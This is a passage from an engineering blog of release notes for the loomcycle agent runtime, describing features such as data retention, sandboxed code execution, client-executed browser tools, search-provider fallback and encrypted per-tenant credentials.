§ blog

Engineering writeups.

Benchmark findings, architecture decisions, and lessons learned from building loomcycle. We post when we have something useful to share - not on a schedule. Subscribe via RSS if you want to know when that happens.

Every experiment below is reproducible. Each one ships as a self-contained directory under loomcycle/examples - with its own loomcycle.yaml, run.sh, .env.local.example, and a reproducible README. Routes Anthropic-OAuth primary with a DeepSeek fallback, so an operator with either credential exercises the same agent. Clone, cd into the directory, run ./run.sh - and the experiment is yours to drive.

2026-07-23 · release · rfc bm · ~13 min read

Data retention arrives: aging out defs, chats, and dead-agent memory (v1.32.0).

RFC BM ships the loomcycle data-retention subsystem: a config-driven, cluster-gated internal/retention goroutine (not a schedule — the loomcycle scheduler only fires agent runs) that ages out data across three independent families, each off | prune | export+prune, each defaulting off. export+prune writes a JSON archive to LOOMCYCLE_RETENTION_EXPORT_DIR before deleting: a failed export never deletes the row. P1: retired def-version purge. Two table-parameterized store methods (ListPurgeableRetiredDefVersions, DeleteDefVersions) purge retired-and-old versions of the nine uniform def families (agent / skill / team / mcp_server / schedule / a2a_server_card / a2a_agent / webhook / memory_backend). Qualifies when retired ∧ created_at < cutoff ∧ NOT the active pointer ∧ beyond keep_last_n, AND is leaf-only — excluded while any version references it as a parent_def_id, so a retired chain drains leaf-first over successive ticks without orphaning a surviving child's lineage. P2: aged chat retention. A session whose runs are all terminal and whose latest completed_at is past the cutoff → export + DeleteSessionCascade. Prunes by session, not by run (continuation replays the whole-session transcript; pruning one aged run would corrupt it). A pinned session is never pruned by any path; exemption lives in PrunableAgedSessions, so it also protects the pre-existing RFC AV usage archiver (which is subsumed via a config alias so a session is never cascade-deleted twice). P3: retired-agent memory reclamation. A fully-retired agent's data spans three stores under two tenant-keying schemes: SQL-Memory scope + dirents are tenant-qualified (tenant, "agent", name) and dropped per tenant; base-memory k/v (no tenant column — shared across tenants for same-named agents) is dropped only when the name is retired in every tenant. Mem sweep runs before defs purge so a same-tick keep_last_n=0 can't orphan memory. Document age-retention was deliberately dropped — the doc store now holds the RFCs themselves. Post-merge review confirmed no data-loss bugs across all three phases and caught two P3 completeness bugs pre-ship (base-memory reclamation was skipping stale retired agents due to a hardcoded ORDER BY updated_at DESC LIMIT 200; defs-before-mem sweep order could orphan memory under keep_last_n=0). GET /v1/_retention reports config + per-family dry-run preview. Runtime-only: no schema migration, no new wire method; adapters unchanged.
2026-07-23 · release · rfc bn + bo + bp · ~14 min read

The Document viewer grows images, diagrams, colors, and edit controls (v1.29.0 → v1.31.0).

Four releases, three RFCs, one reading and writing surface. RFC BN (v1.29.0): Save/Cancel pinned to a sticky top bar (long chunk bodies don't need scrolling to save); chunk bodies render through react-markdown + remark-gfm with a lazy Mermaid renderer at securityLevel:"strict" and resolve.dedupe'd against the teams-board copy; per-document color schemes tint chunk tiles by status and Path-tree rows by type+status (settings live in the root chunk's fields, zero migration); cross-reference edges get a 🔗 badge, a clickable References list, and a collapsible whole-document Mermaid relationship graph. Two additive ops (documents_summary, get_edges) prevent N+1 queries. v1.29.1: a doc-colorizer bundle runs on the code-js provider (zero tokens, deterministic, idempotent) to color a whole Path subtree in one spawn_run. RFC BO (v1.30.0): image and Mermaid chunks become first-class types. Images stored as true binary in a new chunk_assets table under an 8 MiB cap (SQLite BLOB / PostgreSQL BYTEA); a bearer-authed GET /v1/_document/asset/{chunk_id} serves bytes with X-Content-Type-Options: nosniff and a whitelist (PNG/JPEG/GIF/WebP — no SVG, script-in-SVG XSS). Viewer renders both via a blob object URL (bearer can't ride an <img src>); authoring adds an upload button, a paste-a-screenshot handler, a "+ diagram" button, and a live Mermaid preview in the editor. export_md renders images as inline data-URLs and Mermaid as fenced blocks; import_md round-trips both. TS adapter gets fetchDocumentAsset. RFC BP (v1.31.0): per-chunk edit controls — + text inserts after the selected sibling via after_id, ↑/↓ reorder via a new reorder_chunk op that swaps neighbors AND renumbers the whole sibling list to contiguous 0..n-1 in one transaction (self-heals any pre-existing ties/gaps), delete with a danger-button + confirm. Both new backend ops are opt-in; existing behavior byte-unchanged. No schema migration; @loomcycle/client at 1.30.0, Python at 1.25.0, @loomcycle/explorer at 0.4.0.
2026-07-21 · release · rfc bi p2 + rfc bj + rfc bk · ~17 min read

Warm containers, cloneable agents, resident sub-agents (v1.23.2 → v1.28.0).

Three interlocking arcs across seven releases. RFC BI P2 — sandbox hardening. sandbox_open workspace: bind-mounts a durable per-principal /work (fenced as <root>/<principal>/<name>) so a Go module cache survives container reap and sidecar restart. Attested run tagging via the X-Loom-Root-Run header loomcycle forwards (server-set, unforgeable, model-invisible). sandbox_touch keepalive + sandbox_close_run bulk close (principal-scoped, idempotent). Static-MCP servers self-heal at run start when skipped at boot (a sidecar that comes up second recovers on the next run without a restart). Plus three field fixes: writable /work, unified SANDBOX_AUTH_TOKEN env var, and non-login shell so PATH survives (Go/Cargo/Rustc under /usr/local/* were falling off PATH in a login shell). RFC BJ — agent cloning. A Library Clone action derives a NEW agent whose tool list is editable and may widen (only over the operator bearer, never from an in-run LLM). Chat agents get self-service SkillDef (skills stay ⊆ their agent's tools). Fork ceiling check is now glob-aware so a fork of an agent granted a whole MCP server (mcp__sandbox__*) can keep the grant. POST /v1/sessions/{id}/replay {agent, compress?} copies a transcript into a NEW session bound to a (possibly different) target agent: cross-provider safe (reasoning stripped), tenant-gated (opaque not-found), compress: true collapses history to a summary + tail. Every transport picked it up: gRPC ReplaySession, TS replaySession(), Python replay_session. @loomcycle/library → 0.2.0; adapters → 1.25.0. RFC BK — resident sub-agents. Three new Agent ops: open starts a persistent interactive sub-run and returns after its first turn parks; send steers the next turn and blocks until re-park; close finalizes it (idempotent, cascades to grandchildren). The child stays resident: warm sandbox container, warm REPL, full conversation state, survives across the parent's tool calls. Bounded (LOOMCYCLE_MAX_INTERACTIVE_CHILDREN default 8) + reaped (LOOMCYCLE_INTERACTIVE_CHILD_IDLE_TTL_MS default 30 min) + parent-teardown backstop. P2 adds timeout_ms on send, poll (check without new input), cancel (turn-cancel the child's current turn, keep it alive). P3 adds Web UI visibility (GET /v1/_resident, per-run listing, close + turn-cancel actions). Adapters stay at 1.25.0 for the whole RFC BK line. Composes into a real compile-test-fix loop where the chat agent clones itself + adds sandbox tools, delegates to a resident dev/sandbox child that holds a warm workspace across turns, and the module cache survives the whole conversation.
2026-07-17 · release · rfc bi p1 · ~16 min read

Safe code execution: the toolbox image and a sandbox sidecar (v1.23.0 → v1.23.1).

RFC BI P1 ships two opt-in answers to the distroless-runtime-can't-run-code problem. Answer 1: the loomcycle-toolbox image is the SAME loomcycle binary on a Debian base preloaded with a dev toolchain (Python, Go, Rust, C++, Node + git, gh, curl, and after v1.23.1 also jq, rsync, wget, unzip, sqlite3) at the same uid 65532 and mount paths — a drop-in image swap that makes the existing Bash tool and Bashbox host-command fallback usable. Isolation is weak by design (code runs in loomcycle's own container), so single-tenant / trusted only. Published multi-arch as denngubsky/loomcycle-toolbox. Answer 2: for untrusted / multi-tenant code, a standalone builder sidecar runs each session in a dedicated ephemeral container with --network none, --read-only rootfs, tmpfs /work, --cap-drop=ALL, no-new-privileges, non-root, cpu/mem/pids capped, and a pluggable --runtime (runc → runsc → kata). Loomcycle stays distroless and drives it over HTTP-MCP; loomcycle NEVER runs a container engine itself (rootless podman can't in distroless-nonroot; a host engine socket ≈ host root). Six tools — sandbox_open, exec, write, read, close, list — one long-lived container per session (compile→test→fix loop), constant-time bearer auth, principal-owned sessions (a leaked id from another principal never resolves; the P2 tenant seam), TTL GC + boot orphan-sweep via a loomcycle.managed=1 label. Answer 3: the sandbox bundle. Enable with LOOMCYCLE_PRESETS=base,sandbox; registers the dev/sandbox agent + skill + mcp_servers.sandbox wiring (Authorization: Bearer ${run.user_bearer:-${LOOMCYCLE_SANDBOX_TOKEN}}). Without the sidecar deployed the mcp__sandbox__* tools are registered-but-unreachable (lazy retry). Additive: no wire RPCs, no schema migration; adapters bump to 1.23.0 in lockstep with no code change. This is RFC BI P1 (single shared bearer); attested per-tenant identity, run-liveness-poll GC, and the Kata microVM tier are P2/P3 follow-ups. v1.23.1 patch adds HOME in the fallback env for Go/Cargo/npm/pip caches.
2026-07-16 · release · rfc bh · ~13 min read

Interrupt the LLM, keep the chat: turn-scoped cancellation (v1.22.0).

Every serious chat surface has an Esc key. Before v1.22.0 loomcycle's only stop primitive was cancel the run, which threw away the session, transcript, and context. RFC BH splits stop the turn from stop the run. POST /v1/runs/{run_id}/cancel {reason?} → {run_id, stopped, parked} stops the current turn (the in-flight model generation + the tool calls it started) and parks the run at awaiting_input with the session intact. The loop keeps the partial output and synthesizes cancelled by operator tool_results for any in-flight tool_use so the next turn's history stays valid. Run-cancel vs. turn-cancel is double-guarded (ctx.Err()==nil AND the ErrTurnCancelled cause) so a real cancel is never mistaken for a turn-stop. A new turn_cancelled SSE frame distinct from the run-level cancelled. Interactive runs only (409 otherwise); idempotent. Interruption decline: a pending Question can be resolved with {disposition: "declined"} so the agent proceeds without an answer; the waiting Question tool returns a non-error "proceed" result. Cross-replica: a cancel that lands on the wrong replica is owner-routed by runs.replica_id (new internal/turncancel registry + coord.TurnCancelCoordinator). Every transport: gRPC CancelTurn + ResolveInterrupt RPCs, @loomcycle/client.cancelTurn() / cancelInterrupt(), Python cancel_turn / resolve_interrupt / cancel_interrupt; HTTP + gRPC share extracted connector cores. LoomBoard's Esc key was the front-end driver. Also folded in: RFC BG P1 model_pattern ("latest" model resolution — model_pattern: "claude-haiku-*" picks the newest match against the provider's live catalog, generic numeric-run comparator orders qwen3.6 < qwen3.10). Bundled chat: chat/medium + chat/local gain the HTTP tool; new chat/local-small. No schema migration; adapters → 1.22.0.
2026-07-15 · release · rfc bf · ~13 min read

Providers as a YAML block: a config-driven LLM registry (v1.21.0).

Adding an LLM provider used to be a code change. In v1.21.0 it's six lines of YAML. RFC BF ships the providers: top-level map backed by a driver registry: each entry declares a compiled-in driver (anthropic / openai / gemini / deepseek / ollama / mock / code-js), a base_url, an api_key_env (env-var name, resolved server-side, tenant-overridable via CredentialDef, never ${VAR}-interpolated), a max_concurrent, an options map, and a capabilities override block. Add a self-hosted vLLM/llama.cpp/groq/together/second-Ollama with a few lines; driver: openai covers any OpenAI-compatible endpoint. Every existing config keeps working byte-for-byte via an embedded default-providers layer prepended to every config; operator entries deep-merge over it. LOOMCYCLE_NO_DEFAULT_PROVIDERS=1 drops the built-ins entirely. Per-provider max_concurrent caps in-flight runs to one provider — ollama-local: { max_concurrent: 2 } runs a stable batch on one GPU without KV-cache thrashing; the gate is acquired before the global slot so a saturated provider never starves runs targeting other uncapped providers. Sub-agents gate on their resolved provider with a deadlock carve-out (a fan-out parent holding provider P's slot never queues behind its own children). Capability overrides re-enable vision for a multimodal model behind an OpenAI-compat base_url, applied inside the driver so KeyedProvider / ThinkingDowngrader behaviours are preserved. Post-merge review fixes: keyless third-party providers now enable on declaration (the headline self-hosted case); the anthropic/gemini/ollama drivers now forward api_key_env to KeyEnvName() so CredentialDef overrides target the right var; carve-out cap-escape on fallback now logs a WARN. CLI parity: validate / agents / doctor resolve from the same embedded default layer. No schema migration; @loomcycle/client + Python → 1.21.0 in lockstep with no adapter code change.
2026-07-14 · release · rfc be · ~14 min read

The History tool: past chats become a primitive (v1.20.0).

RFC BE ships the History tool: a built-in surface with ten ops for reaching past chats. list (chats in a scope, pinned-first, paginated, per-chat token/cost/run-count aggregates), get (metadata + full transcript, format:markdown renders it), search (case-insensitive title match; body-search FTS is deferred), rename / annotate / pin / archive, recap (idempotent LLM summary stored on the session row, live-and-parked-chat-safe), resume (returns a continuation handle for a new run against the chat's session_id), related (semantic similar-chats via the configured embedder, cosine ranking in Go, no pgvector). Owner scopes self / user / tenant / global, gated per agent by history_scope, resolved server-side from RunIdentity(ctx) and never the wire. Cross-scope by-id reads fold to an opaque not-found so session IDs are never an existence oracle. global is stripped for non-admin principals at policy resolution and fails closed (an absent principal loses global). A "chat" is a session (session → runs → events); History adds the human and organizational layer on top: title, description, tags, pinned, archived_at, summary, summary_updated_at (migration 0057). Related's index is a small session_embeddings table (migration 0058) filled lazily on recap / rename / annotate. Transcripts are persisted already-redacted (RFC Z) so a History reader can never see a secret. Transports: HTTP POST /v1/_history, gRPC History RPC, MCP history meta-tool, @loomcycle/client + Python at 1.20.0. Supersedes and removes Context op=history. Also folds in five post-merge review fixes (#723) including the strict identity-required rule for self and user scope (no more silent widening to the whole tenant on an empty owner axis).
2026-07-13 · release · rfc ap + rfc bd · ~16 min read

Agent teams: state machines that drive multi-agent work (v1.17.0 → v1.19.2).

Four weeks in one arc. RFC AP added a first-class multi-agent workflow primitive to loomcycle: a TeamDef is a state-machine graph over your agents. States name the work. Transitions name the outcomes (success / pushback:<reason> / conditional:<expr>, bounded by a per-state max_iterations). Handlers are agent | parallel+consolidator | consolidator | terminal. Content-addressed, tenant-scoped, versioned — peer of AgentDef / SkillDef / VolumeDef. Two drivers run the same graph: a deterministic op=run walk engine (pure Go, testable end to end, right for scheduled/headless pipelines) and the bundled LLM team/orchestrator agent (RFC BD — reads the graph as its map, drives transitions, keeps a human in the loop via the Interruption tool). The Web UI teams board ships as a two-pane editor: graph JSON on the left, live Mermaid state diagram on the right, dry-run render on unsaved edits (no persist), draggable splitter, starter-template dropdown, tenant-scoped delete op. v1.19.0 filled the deferrals: parallel fan-out plus consolidator execution in the deterministic engine (three wait modes: all, any, at_least:N; results envelope; consolidator emits signal: <edge>); durable Document-backed boards (board_chunk_id writes chunk.status at every transition; the walk engine resumes from it on restart); interrupt-on-cap (an iteration-cap overflow escalates to a human with continue / reroute / abort options instead of aborting); gRPC RPC plus @loomcycle/client plus Python adapter methods at 1.19.0 parity; per-tenant credentials for raw Bash via LOOMCYCLE_BASH_ALLOWED_CREDS, so a software team gets its own GITHUB_TOKEN without the operator's host key. v1.19.1 made the Interruption tool self-enable on tool-list presence (redundant second gate removed). v1.19.2 added startup warnings for empty capability gates and immediately caught three shipped-bundle bugs where AgentDef / Channel tools were listed without their scope lists. Two starter teams in the team-examples bundle: SDLC (architecture → implementation → review → pr, with a pushback:code-fix loop) and marketing (draft → edit → published, with a pushback:revise loop). Screenshots of both in the post.
2026-07-08 · product · loomboard v0.1.2 · ~13 min read

LoomBoard v0.1.2 ships: a desktop chat app for loomcycle.

Nine days after the "and the frontend I had to build" section of the TrueNAS field report, that frontend ships. LoomBoard v0.1.2 is a native desktop chat app for the loomcycle agentic runtime, packaged four ways on one React codebase: a Tauri v2 desktop app for macOS (universal DMG), Windows (NSIS + MSI), and Linux (AppImage + deb); an npm CLI runner (@loomboard/app) that opens the same UI in your default browser through a small local reverse-proxy that sidesteps browser CORS (loomcycle sends no CORS headers by design); an embeddable React component (@loomboard/chat) with peer deps react, react-dom, @loomcycle/client; and a Chrome MV3 side-panel extension that registers browser_read_page / fill / click / navigate as RFC BC client-executed tools so an agent can read and actuate on any page you have open (not yet on the Chrome Web Store; ships as a "Load unpacked" zip). Thin-client architecture: no LoomBoard-side backend, database, auth, or message queue; loomcycle owns everything stateful. Bearer tokens sit in local storage; the CLI proxy forwards but never reads or logs them. Six shipped capabilities: streamed output with tool calls + reasoning traces (Anthropic thinking, OpenAI o-series, DeepSeek reasoner, Ollama think:true, Gemini thinking — all now legible thanks to the v1.8.2 loop fix); live token/throughput/context HUD + context compaction; Interruption answers in place (no modal, no thread break); image + PDF + DOCX attachments (pdfjs-dist + mammoth extract text in the browser before sending); embedded Skills + MCP catalog via the reusable @loomcycle/library React component (RFC AY); inline budget warnings that render RFC AW's EventLimit as amber (soft) / red (hard) banners in the transcript. Chrome extension actuation is gated: a Confirm-vs-Auto toggle raises an approval bar per action in Confirm mode (default); sensitive fields (passwords, payment) always require confirmation regardless of mode. All builds UNSIGNED for v0.1.x — macOS Gatekeeper: right-click → Open; Windows SmartScreen: "More info" → "Run anyway"; documented on the download page. Signed builds arrive with v0.2 (Apple Developer ID + Windows code-signing cert), Board mode + Explorer mode target v0.3, Android/iOS via Tauri mobile after that, Chrome Web Store submission after v0.2 signing. Apache-2.0. Full download strip, install verification commands, and screenshots on loomcycle.dev/loomboard. Repo at github.com/denn-gubsky/loomboard. Composes existing loomcycle primitives without adding anything to the runtime: OperatorTokenDef auth, interactive-session steer/replay, EventThinking + EventLimit stream events, @loomcycle/library embed, RFC BC client-executed tools for the extension. Any client that speaks the same wire is a peer.
2026-07-07 · release · rfc bc · ~15 min read

Client-executed tools: the agent's eyes and hands (v1.16.0 → v1.16.1).

RFC BC inverts the tool-execution direction. A client (browser, IDE, mobile app) opens a WebSocket to the runtime and registers its own tools; when the agent calls one, the runtime routes the invoke over the socket to the connected client, which runs the tool locally and returns the result. From the model's point of view, an ordinary tool call. From the operator's, the agent got a new capability with zero server code. Layer 1: a transport-agnostic registry that owns invoke↔result correlation, per-principal connection map, per-key connection cap, delegate-and-block Invoke that fails cleanly on disconnect / no-client / timeout, most-recently-registered-wins routing. Layer 2: GET /v1/client-tools, a bearer-authed WebSocket endpoint that accepts bearer.<token> as a Sec-WebSocket-Protocol entry (browsers can't set Authorization headers on a WS handshake); app subprotocol loomcycle.client-tools.v1; ping heartbeat; single-writer-mutex so heartbeat and read-pump don't collide. Layer 3: the model sees the connected principal's client-tools as client__-prefixed tools; grants gate access via client__browser_* globs on the agent's tools: allowlist; each advertised tool is a delegating adapter whose Execute calls registry.Invoke; routing key comes from RunIdentity, never the tool input (security-critical). Layer 4: a TypeScript connectClientTools helper in @loomcycle/client that opens the WebSocket, sends hello, dispatches invoke → onInvoke → result, auto-reconnects; dependency-free (global WebSocket in browsers/Node 22+, injected WebSocketImpl on older Node). v1.16.1 fixes the wire-safe name (client: → client__) — Anthropic, OpenAI, and Ollama all reject colons in tool names, so v1.16.0 was uncallable end-to-end until the rename; bare names validated at the WS hello boundary ([a-zA-Z0-9_-]{1,64}), invalid names silently skipped, hello_ok reflects the accepted set. Also: RFC BC dropped the planned FallbackFunc composition because client-tools have no handshake (advertised-or-absent); simpler mental model, cheaper to reason about. LoomBoard's Chrome side-panel extension is the first customer. Migrated from a channel-bridge (RFC S) to RFC BC in the same three-day window; commit 2ff4ace lands the client-tool actuation for browser_read_page / fill / click / navigate, with a Confirm-vs-Auto approval bar (sensitive fields always confirm). Composition: reuses RFC L operator tokens, RFC AG per-principal MCP dispatch, RFC AO declared principals, RFC BA on-demand Skills. Doesn't touch MCPServerDef; client-tools are a distinct primitive.
2026-07-06 · release · rfc bb · ~14 min read

Search providers, first-class (v1.15.0 → v1.15.1).

Two weeks after the "Brave killed the free tier" research landed as RFC AR, here's the shipped answer. WebSearch stops being Brave-only and becomes a multi-provider fallback circuit. A new internal/search connector package with a Provider interface (ID / Search / KeyEnvName / Probe) and five pure-HTTP drivers: Brave (own index), Serper (Google SERP scraper — cheapest at scale, $0.10-$0.30/1K at Pro), Exa (own neural index — the semantic-search complement, 20K/mo free), Tavily (RAG-purpose-built), SearXNG (self-hosted; aggregates 70+ engines; no API key). Each driver normalizes provider JSON to a common []Result{Title, URL, Snippet}. Two new config fields: search_providers: map with per-provider settings (SearXNG needs base_url), search_priority: global fallback order. Per-AgentDef.search_providers overlay narrows an agent's cascade; participates in content_sha256 because a different cascade changes agent behavior. Boot validation mirrors provider_priority: enabled set checked against KnownProviderIDs(), SearXNG requires base_url, and cascades must reference only enabled providers. The fallback circuit: WebSearch walks the resolver's cascade, resolves each provider's key via ResolveKeyOrOperator (RFC AR CredentialDef overrides the operator host key; RFC AX providers:operator-key restriction honored), and on provider error / empty result / un-keyable falls over silently to the next. The model sees the same "[N] Title — URL\n snippet" text regardless of which provider answered. A failed provider is marked stalled (short cooldown; no active probing of paid providers). Back-compat: pre-RFC-BB WebSearch worked on a single BRAVE_API_KEY; default config puts Brave at the top of search_priority, so deployments that never touch the new config keep working. The routing view: GET /v1/_routing gains a search block with per-provider keyable / available / selected / reachable / last_error — computed with the same admin/tenant posture as the LLM cascade. Web UI Routing page adds a "search providers" section with availability dots, "selected" badge, "no key" marker; Settings → Credentials key-name combobox extends with SERPER/EXA/TAVILY (BRAVE already present). Sub-agents get their own def's list stamped on the loop ctx at spawn (mirrors WithAgentTools). v1.15.1 adds an opt-in provenance footer: LOOMCYCLE_WEBSEARCH_PROVENANCE=1 appends (via searxng) or (via brave — searxng, serper fell over) below successful results; off by default (byte-identical output for downstream parsers). Also fixes the Library detail-panel independent scroll (#674) and documents search_providers in loomcycle.example.yaml. Bumps @loomcycle/client to 1.15.0 to publish LibraryAgentDefinition.search_providers; Python (gRPC-only, opaque overlay) stays 1.13.0. No wire change; WebSearch output byte-identical.
2026-07-05 · release · rfc ba · ~12 min read

Skills that load only when you need them (v1.14.0 → v1.14.1).

RFC BA lands on-demand skills. Skill bodies stop bundling into the system prompt at boot; the runtime auto-wires a new Skill tool with list + invoke ops that loads bodies on the first invoke. The agent's skills: field becomes a pattern allowlist (globs like doc/* or writing/*). Empty means allow-all with the Skill tool auto-added; -* means deny-all (no Skill tool wired). Named patterns compose: [doc/*, -doc/adversarial-*] allows the domain minus specific denies. A new ordered skillmatch evaluator walks the patterns first-match-wins. Skills are now named with /-grouped segments (doc/chunk-review, writing/linkedin-post) so a whole domain can grant in one line; adding a new skill under an existing domain doesn't need an AgentDef edit. Breaking: the skill_def_scopes field is removed. It used to gate SkillDef authoring (create/fork/promote/retire) separately from skills:; RFC BA unifies both under the same allowlist. Authoring a SkillDef with a name outside the agent's allowlist returns the same typed error as trying to invoke a name outside. One field, one truth. AgentDefs that reference skill_def_scopes won't load; migration is either promote those patterns into skills: (usually identical in practice) or delete the field. Adapter shape unchanged (skills stays a string[] on the AgentDef wire). Another subtle detail: the skills: allowlist is EXCLUDED from content_sha256 because it's authority-only, not identity-changing (compare to providers: or search_providers: which do hash). The Skill tool's list returns a filtered catalog: static bundles + inline defs + tenant SkillDefs, narrowed by the allowlist + optional /-glob pattern; only name and description come back (bodies stay in the substrate). invoke checks the name against the allowlist, loads the body, runs it, returns the result as a normal tool_result. Ephemeral per-run "skills available" note injected when an agent has a whitelist (positive patterns), giving the model a running-start view without paying the full-body cost. v1.14.1 groups bundled document-agent skills under doc/* (13 skills in the doc domain) and collapses doc-manager's allowlist to skills: [doc/*]; a follow-up switches the standalone document-agent + chat bundles to local-first routing (ollama-local → deepseek → anthropic, tier aliases, autocompact 80→60). No wire/schema change; adapters stay 1.13.0. On the reference workload (document-agent supervisor with a dozen skills), the combined effect (bodies-on-demand + autocompact 80→60 + local-first) shrinks per-request cost by more than half.
2026-07-04 · release digest · ~14 min read

Budgets, costs, and encrypted credentials (v1.9.0 → v1.11.1).

Three days, five releases, four arcs deeply intertwined. Arc 1: a whole-repo hardening pass (v1.9.1) closes 17 findings from a proper security review. Tenant-isolation gaps sealed on four transports: gRPC read + channel RPCs now flow through grpcTenantScope (cross-tenant reads return NotFound, not PermissionDenied, so tenant membership isn't leaked by response shape); A2A peer auth moves off the legacy path onto the operator-token substrate; the mem9 memory backend blocks SSRF and API-key exfil via model-authored base_url; run cancel + interrupt-resolve gate the target's tenant on every transport. Secret-exposure gaps closed at write-time (not read-time) for the tool-call transcript, the audit-log Authorization header capture, the Context op=self pepper leak, and the OpenAI Bearer at INFO on retry. Six provider-driver fixes: Anthropic replays the thinking block on tool-use continuations; OpenAI reasoning models use max_completion_tokens instead of the ignored max_tokens; Ollama surfaces in-stream error frames instead of returning empty text; DeepSeek's thinking-model downgrade goes to deepseek-chat (not -flash) and drops the effort hint; grep re-checks symlink containment before os.Open (closes a TOCTOU); runstate delivers events under the write lock (ends a send-on-closed race). And the MCP thin client now transparently re-handshakes on 404 / -32001 on both HTTP and stdio — the "please /reload-plugins" dance is gone as a class of friction. Arc 2: CredentialDef (RFC AR) — a new substrate Def family for encrypted per-tenant secrets. Envelope AES-256-GCM: a deployment KEK (LOOMCYCLE_SECRET_KEY), a per-tenant DEK derived via HKDF-SHA256, GCM AAD binding each ciphertext to key_id | tenant | scope | scope_id | name (so a row copied to another tenant fails authentication at decrypt). Fail-closed on missing KEK; supports LOOMCYCLE_SECRET_KEY_PREVIOUS for current+previous rotation with lazy re-encrypt on read. The credential_defs table (migration 0051, both backends) holds sealed ciphertext or an external-backend pointer, never plaintext; deliberately excluded from snapshots. Consumers: $cred:<name> substitution in HTTP MCP server headers (resolved per-request from the run's identity with scope precedence agent > user > tenant; a shared MCP client pool can post as different users on different runs); tenant + user provider-key override by env-var name (a CredentialDef named ANTHROPIC_API_KEY at tenant scope shadows the operator host key for every Anthropic call from that tenant's runs, same shape for OpenAI/Gemini/hosted Ollama/DeepSeek/Brave; model-availability probes stay on the operator key; fail-soft to the host default). Arc 3: cost attribution (RFC AV) — a per-call token_usage ledger (migration 0052, both backends) records one row per LLM call with a credential_source label (operator / tenant / user), four token buckets, priced cost (DOUBLE PRECISION, nullable when unpriced; distinct from a genuine zero), and a per-run summary written at FinishRun. Pricing lives in the operator's yaml (provider-reported cost wins when the driver returns one; otherwise loomcycle computes tokens × per-1M rate). Per-call granularity is exact across a mid-run provider fallback. GET /v1/_usage returns aggregated reports grouped by any combination of tenant / user / provider / model / source with a whitelisted dimension list; the operator-vs-tenant split falls out of the group-by. A Web UI Usage page renders the report with group-by chips, a from/to window, admin tenant focus, and a summary strip showing operator-bill vs tenant-funded split plus an unpriced-calls indicator. Retention: a rollup-and-prune sweeper compacts old rows into usage_archive; an old-run archiver exports pruned run transcripts into runs_archive. gRPC / TypeScript / Python adapter parity in Phase 2c. Arc 4: token budgets (RFC AW). A budget is {tenant, scope, scope_id, window, soft, hard}; scope is operator / tenant / user; window is a calendar-month UTC; either or both of soft/hard can be set. Most-restrictive-of-the-three-scopes wins (an operator-wide soft of 10M, a tenant soft of 2M, and a user soft of 500K resolve to a 500K ceiling for that user). Enforcement: at admission, limits.Check refuses over-hard runs with runner.ErrTokenLimitExceeded (429 on HTTP, ResourceExhausted on gRPC); in flight, recordCallUsage emits an EventLimit event on newly-crossed thresholds. The in-memory tracker boot-seeds from the token_usage ledger so a restart doesn't reset counters. EventLimit is a new event type carrying LimitInfo{scope, scope_id, severity, window, used, limit, message}, riding the same event channel as text/tool-use/thinking events; lands on HTTP SSE, gRPC Run/Continue streams, MCP spawn_run result (Limits alongside Usage), the TS adapter's "limit" event type, the Python adapter's LimitInfo dataclass, and the Web UI's run terminal (amber banner for soft, red for hard, inline in the transcript, sourced from live stream or persisted row). GET/PUT/DELETE /v1/_limits + the gRPC TokenLimit(list|set|delete) RPC share a single limits.ResolveWrite confinement helper (tenant operator writes only its own tenant's rows; operator-global is admin-only). A Web UI Limits page (CRUD + live month-to-date used column, K/M/G shorthand in the editor with a live "= 5,000,000" recognition hint). Small wins: a routing view (GET /v1/_routing) shows the live provider/model cascade per tier with an admin availability check; RFC AU lands a Web UI action for tenant import of Claude Code skills + MCP servers (paste a .claude/ directory, get tenant-scoped SkillDefs + MCPServerDefs, with a proprietary-tool gap flag); a Path VFS fix synthesizes implicit-directory entries in one-level ls so Path op=ls /loomcycle/ now returns the rfcs/ folder alongside direct-leaf documents. Together with last week's tenant-operator Web UI, this is the substrate for shared-tenancy at real scale: tenant plugs in its own provider keys, browses spend at any dimension, caps user spend, and sees every over-budget refusal render inline as an EventLimit event. TrueNAS deploy artifacts pinned to 1.11.1.
2026-07-01 · release digest · ~16 min read

Tenant surfaces, TrueNAS deployment, and thoughts on the wire (v1.6.1 → v1.8.2).

Five days, eight releases, three arcs, plus a handful of small wins that end old friction. Arc 1: tenant surfaces (RFC AS). A substrate:tenant bearer could authenticate in v1.0 but the Web UI showed them either empty pages or forms that 403'd on the next click. Five patches close every surface: v1.6.3 tenant-scopes the Library + def-plane /names reads and gates the Library route at substrate:tenant (Phase 1), plus per-surface nav visibility so a tenant operator sees only what they can act on (Phase 2); v1.6.3 also prevents the UI from minting substrate:admin tokens (lockout footgun). v1.6.4 completes RFC AS: static/bundled agents visible as read-only reference items, schedules tenant-scoped, Path/Document browse-by-subject (backend accepts a caller-chosen subject with tenant-scoped validation; the topbar UI gets a subject picker), audit log tenant-scoped via owning session. v1.6.5: bundled inline top-level skills surface in the Library (the handler had been reading only from the skills: section, ignoring RFC AQ bundles), and Document op=create_document always registers a Path dirent (defaulting to /documents/<title>) plus a new Document op=set_path to attach or re-home a path for an existing document, so a document is never orphaned from the Path/Library browser. v1.6.6: sub-agent session inherits parent's tenant via parentIdentity.TenantID passed to openOrCreateSessionAndRun, fixing the 404-session-not-found a tenant operator hit opening a sub-agent run. v1.6.7: Context op=self reports the full principal block (subject, tenant_id, scopes, token_def_id, is_admin, legacy) plus a server block (listen_addr + LOOMCYCLE_PUBLIC_URL) so an agent over MCP can identify its tenant, credential, and instance. Load-bearing shape: admin sees all with an optional ?tenant= focus filter; a substrate:tenant operator is confined by construction; cross-tenant reads return empty results (never 403); nav visibility derives from the bearer's scopes. Arc 2: TrueNAS deployment moved from possible to supported. Distributed across every version tag as small docs + config commits: v1.6.2 softens the Postgres floor to ≥14 (was pinned at 16), moves secrets from inline compose YAML into an external env_file, ships a chat + chat-local bundle (two ready-to-drive bundled agents targeting tier:middle and local-medium), adds LOOMCYCLE_OLLAMA_LOCAL_NUM_GPU as a top-level knob for the ollama-local provider (the num_gpu lever from the TrueNAS field-report post, now provider-wide instead of per-model). v1.6.4 fixes the SQL-Memory role docs (needs CREATEROLE to provision per-scope least-privilege roles at runtime; a plain CREATE USER silently fails until an agent opens a SQL-Memory scope). v1.6.7 wires LOOMCYCLE_PUBLIC_URL into the deploy compose + INSTALL.md so Context op=self reports a real URL from a fresh install. Composite effect: a fresh TrueNAS install follows the INSTALL top to bottom without maintainer hand-holding. Arc 3: vision + thoughts on the wire. v1.7.0 lands image/vision input across all providers (RFC AT) with per-provider serialization (Anthropic native discriminated blocks; OpenAI/OpenAI-compat content array; Gemini inlineData; Ollama message images 